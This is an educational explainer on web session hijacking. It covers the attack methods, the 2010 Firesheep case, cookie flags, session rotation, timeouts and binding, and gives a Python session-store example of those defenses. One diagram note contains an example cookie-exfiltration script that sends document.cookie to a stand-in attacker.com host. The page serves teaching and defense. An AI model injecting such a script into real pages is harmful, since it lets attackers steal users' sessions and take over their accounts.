Session Hijacking
1. Definition
Session Hijacking (or Session Side-Jacking) is an attack where an intruder takes control of a user’s session. The attacker steals or predicts a valid Session ID (usually stored in a cookie) and uses it to impersonate the victim. The server believes it is communicating with the legitimate user.
2. Technical Explanation
HTTP is stateless. To maintain state (login status), servers issue a Session ID. If this ID is stolen, the “Key” to the account is lost. Passwords are irrelevant at this stage.
Common Methods:
- Session Sniffing: Intercepting unencrypted HTTP traffic (Wi-Fi).
- Cross-Site Scripting (XSS): document.cookie theft.
- Session Fixation: Attacker sets the victim’s session ID to a known value before they log in.
- Session Prediction: The ID generation algorithm is weak (e.g., sequential numbers).
3. Attack Flow (Cookie Theft via XSS)
sequenceDiagram
participant Victim
participant App as Web App
participant Attacker
Victim->>App: Login
App-->>Victim: Set-Cookie: session=ABC123XYZ
Note over Victim: Victim visits compromised page (XSS)
Victim->>Attacker: GET /steal?cookie=ABC123XYZ
Note right of Victim: Malicious Script executes:<br/>fetch('attacker.com?c=' + document.cookie)
Attacker->>App: GET /account (Cookie: session=ABC123XYZ)
Note right of Attacker: Attacker replays the stolen cookie
App-->>Attacker: 200 OK (Victim's Dashboard)

4. Real-World Case Study: Firesheep (2010)
Context: The Era of HTTP-only Web. Vulnerability Class: Session Side-Jacking (Unencrypted Transport).
The Tool: In 2010, Eric Butler released Firesheep, a Firefox extension. At that time, sites like Facebook and Twitter used HTTPS for login but reverted to HTTP for the session. Firesheep sniffed open Wi-Fi traffic (like in a coffee shop) for unencrypted session cookies. It presented a sidebar of logged-in users nearby. A user could double-click a name and instantly become that user on Facebook.
Impact: It forced the entire industry to adopt HTTPS for the whole session (enforced with HSTS) and Secure cookies, marking the end of mixed HTTP/HTTPS sessions.
5. Detailed Defense Strategies
A. Secure Cookie Attributes
Configure the session cookie with strict flags:
- Secure: The cookie is ONLY sent over encrypted HTTPS connections. Prevents sniffing.
- HttpOnly: The cookie CANNOT be accessed by JavaScript (document.cookie). Prevents XSS theft.
- SameSite (Strict or Lax): Prevents CSRF and some leakage.
Set-Cookie: session_id=...; Secure; HttpOnly; SameSite=Lax

B. Session Rotation (Regeneration)
Always generate a new Session ID immediately after a successful login.
- Prevents Session Fixation. If an attacker injected a session ID before login, it becomes invalid the moment the user authenticates.
C. Short Session Lifetimes
- Idle Timeout: Log out after 15-30 minutes of inactivity.
- Absolute Timeout: Force re-authentication after a fixed period (e.g., 24 hours).
D. Session Binding (Advanced)
Bind the session ID to client properties (User-Agent, IP Subnet).
- Check: If a request comes with the same Cookie but a different User-Agent, invalidate the session.
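The defenses in sections A through D, combined in one server-side session store as an added example (not code from the original page): random IDs, regeneration on login, idle and absolute timeouts, and User-Agent binding. The cookie name `session_id`, the class and function names, and the timeout values are assumptions chosen to match the text.

```python
import secrets
import time

IDLE_TIMEOUT = 30 * 60        # seconds of inactivity before logout (section C)
ABSOLUTE_TIMEOUT = 24 * 3600  # hard cap on session age regardless of activity


class SessionStore:
    """Server-side session table: opaque random IDs mapped to session records."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, user_agent, now=None):
        """Issue a fresh, unpredictable session ID bound to the client's User-Agent."""
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # 256 bits of randomness: defeats Session Prediction
        self._sessions[sid] = {"user": user, "ua": user_agent,
                               "created": now, "last_seen": now}
        return sid

    def rotate(self, old_sid, user, user_agent, now=None):
        """Regenerate the ID on login (section B): a pre-login, possibly fixated ID dies here."""
        self._sessions.pop(old_sid, None)
        return self.create(user, user_agent, now)

    def validate(self, sid, user_agent, now=None):
        """Return the session's user, or None after revoking it on any failed check."""
        now = time.time() if now is None else now
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        expired = (now - rec["last_seen"] > IDLE_TIMEOUT
                   or now - rec["created"] > ABSOLUTE_TIMEOUT)
        if expired or rec["ua"] != user_agent:
            # Stale session, or the same cookie replayed from a different client (section D)
            del self._sessions[sid]
            return None
        rec["last_seen"] = now
        return rec["user"]


def set_cookie_header(sid):
    """Build the Set-Cookie line from section A (cookie name 'session_id' is assumed)."""
    return f"Set-Cookie: session_id={sid}; Secure; HttpOnly; SameSite=Lax"
```

The IP-subnet binding from section D is left out; it is the same comparison as the User-Agent check, applied to the client address.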
